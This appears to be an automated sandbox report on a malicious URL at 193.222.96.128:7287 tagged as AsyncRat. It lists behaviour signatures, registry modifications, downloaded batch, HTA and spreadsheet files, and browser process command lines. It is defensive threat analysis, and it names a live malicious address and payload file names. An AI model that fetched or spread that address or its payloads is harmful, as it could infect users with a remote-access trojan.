Analysis Overview
Threat Level: Known bad
The file http://193.222.96.128:7287/ was found to be: Known bad.
Malicious Activity Summary
AsyncRat
Async RAT payload
Blocklisted process makes network request
Checks computer location settings
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
Suspicious use of FindShellTrayWindow
Opens file in notepad (likely ransom note)
Suspicious use of WriteProcessMemory
Checks processor information in registry
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
Suspicious use of SendNotifyMessage
Modifies registry class
NTFS ADS
Suspicious behavior: GetForegroundWindowSpam
Uses Task Scheduler COM API
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-04-19 15:57
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-04-19 15:57
Reported
2024-04-19 16:03
Platform
win10v2004-20240412-en
Max time kernel
300s
Max time network
304s
Command Line
Signatures
AsyncRat
Async RAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
Enumerates physical storage devices
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 = 14002e803accbfb42cdb4c42b0297fe99a87c6410000 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257" | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\MRUListEx = ffffffff | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16" | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\Mode = "4" | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupView = "4294967295" | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\FFlags = "1" | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1 = 14002e8005398e082303024b98265d99428e115f0000 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\LogicalViewMode = "1" | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\Version = "1" | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 00000000ffffffff | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 0100000000000000ffffffff | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 0000000001000000ffffffff | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\SniffedFolderType = "Downloads" | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByDirection = "4294967295" | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\SniffedFolderType = "Generic" | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\IconSize = "16" | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 14001f50e04fd020ea3a6910a2d808002b30309d0000 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByKey:FMTID = "{B725F130-47EF-101A-A5F1-02608C9EEBAC}" | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = ffffffff | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1" | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByKey:PID = "14" | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\NodeSlot = "1" | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0" | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\FFlags = "1092616257" | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0e000000ffffffff | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\NodeSlot = "2" | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\KnownFolderDerivedFolderType = "{885A186E-A440-4ADA-812B-DB871B942259}" | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0" | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259} | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
NTFS ADS
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\Downloads\15.bat:Zone.Identifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| File created | C:\Users\Admin\Downloads\index.hta:Zone.Identifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| File created | C:\Users\Admin\Downloads\index(1).hta:Zone.Identifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| File created | C:\Users\Admin\Downloads\GoGi.bat:Zone.Identifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| File created | C:\Users\Admin\Downloads\jiteon.xlsx:Zone.Identifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Opens file in notepad (likely ransom note)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\NOTEPAD.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\NOTEPAD.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url "http://193.222.96.128:7287/"
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url http://193.222.96.128:7287/
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1716.0.748411504\861399078" -parentBuildID 20230214051806 -prefsHandle 1804 -prefMapHandle 1796 -prefsLen 22076 -prefMapSize 235121 -appDir "C:\Program Files\Mozilla Firefox\browser" - {27fccf99-4260-425d-99f6-3f24e5d01725} 1716 "\\.\pipe\gecko-crash-server-pipe.1716" 1884 2e29c70ea58 gpu
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1716.1.138431360\1987171567" -parentBuildID 20230214051806 -prefsHandle 2448 -prefMapHandle 2444 -prefsLen 22927 -prefMapSize 235121 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {890110b5-bc17-4d2c-bc1c-e31324d6da70} 1716 "\\.\pipe\gecko-crash-server-pipe.1716" 2476 2e288489058 socket
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1716.2.40416309\731482835" -childID 1 -isForBrowser -prefsHandle 3124 -prefMapHandle 3120 -prefsLen 22965 -prefMapSize 235121 -jsInitHandle 1296 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {9f8a09c5-4824-4734-ac39-70b52d034736} 1716 "\\.\pipe\gecko-crash-server-pipe.1716" 3076 2e29f63e558 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1716.3.1814357587\895428089" -childID 2 -isForBrowser -prefsHandle 3872 -prefMapHandle 3868 -prefsLen 27616 -prefMapSize 235121 -jsInitHandle 1296 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c418a55c-6c1d-41a8-bf3e-7ffa99b591ac} 1716 "\\.\pipe\gecko-crash-server-pipe.1716" 3884 2e28847ae58 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1716.4.1950139730\442656087" -childID 3 -isForBrowser -prefsHandle 5156 -prefMapHandle 5152 -prefsLen 27697 -prefMapSize 235121 -jsInitHandle 1296 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {4e511be1-32c8-4cc2-847d-6c9ff30d630d} 1716 "\\.\pipe\gecko-crash-server-pipe.1716" 5004 2e2a296b258 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1716.5.1027841266\366751635" -childID 4 -isForBrowser -prefsHandle 5172 -prefMapHandle 5176 -prefsLen 27697 -prefMapSize 235121 -jsInitHandle 1296 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e45dafc5-ff67-410a-a601-1032514c435c} 1716 "\\.\pipe\gecko-crash-server-pipe.1716" 5308 2e2a30cc758 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1716.6.495439415\1688938685" -childID 5 -isForBrowser -prefsHandle 5568 -prefMapHandle 5564 -prefsLen 27697 -prefMapSize 235121 -jsInitHandle 1296 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {2e1c3b01-a8c7-4a97-9079-375a14f935da} 1716 "\\.\pipe\gecko-crash-server-pipe.1716" 5484 2e2a30cd058 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1716.7.849901555\1470011006" -childID 6 -isForBrowser -prefsHandle 5244 -prefMapHandle 5208 -prefsLen 27737 -prefMapSize 235121 -jsInitHandle 1296 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {bf25254b-b9f7-4fd9-a7d9-194410428f3c} 1716 "\\.\pipe\gecko-crash-server-pipe.1716" 5232 2e2a4158758 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1716.8.1396890668\1422348576" -childID 7 -isForBrowser -prefsHandle 5456 -prefMapHandle 5460 -prefsLen 27737 -prefMapSize 235121 -jsInitHandle 1296 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {936b04b0-ee0c-4157-b1c5-4c852db4e4c6} 1716 "\\.\pipe\gecko-crash-server-pipe.1716" 5932 2e29e8c3b58 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1716.9.2007607417\154283277" -childID 8 -isForBrowser -prefsHandle 4608 -prefMapHandle 3564 -prefsLen 27737 -prefMapSize 235121 -jsInitHandle 1296 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {60d765d3-345c-41aa-9b77-e00a0c6f9513} 1716 "\\.\pipe\gecko-crash-server-pipe.1716" 1540 2e29e629d58 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1716.10.131863300\526272546" -childID 9 -isForBrowser -prefsHandle 6476 -prefMapHandle 6472 -prefsLen 27816 -prefMapSize 235121 -jsInitHandle 1296 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {8f0d99e0-3fc9-4558-af31-b6884fcaa9b5} 1716 "\\.\pipe\gecko-crash-server-pipe.1716" 6488 2e2a4b95358 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1716.11.1475847541\2054531302" -childID 10 -isForBrowser -prefsHandle 6736 -prefMapHandle 6732 -prefsLen 27816 -prefMapSize 235121 -jsInitHandle 1296 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {54cc6389-6d2a-4122-b527-e49c3cbbb04f} 1716 "\\.\pipe\gecko-crash-server-pipe.1716" 6708 2e2a5b09058 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1716.12.1487225003\675476188" -childID 11 -isForBrowser -prefsHandle 6968 -prefMapHandle 6964 -prefsLen 27816 -prefMapSize 235121 -jsInitHandle 1296 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e85508ba-addf-4b88-947e-fd370e035bb2} 1716 "\\.\pipe\gecko-crash-server-pipe.1716" 6976 2e2a5bbe258 tab
C:\Program Files\Mozilla Firefox\firefox.exe
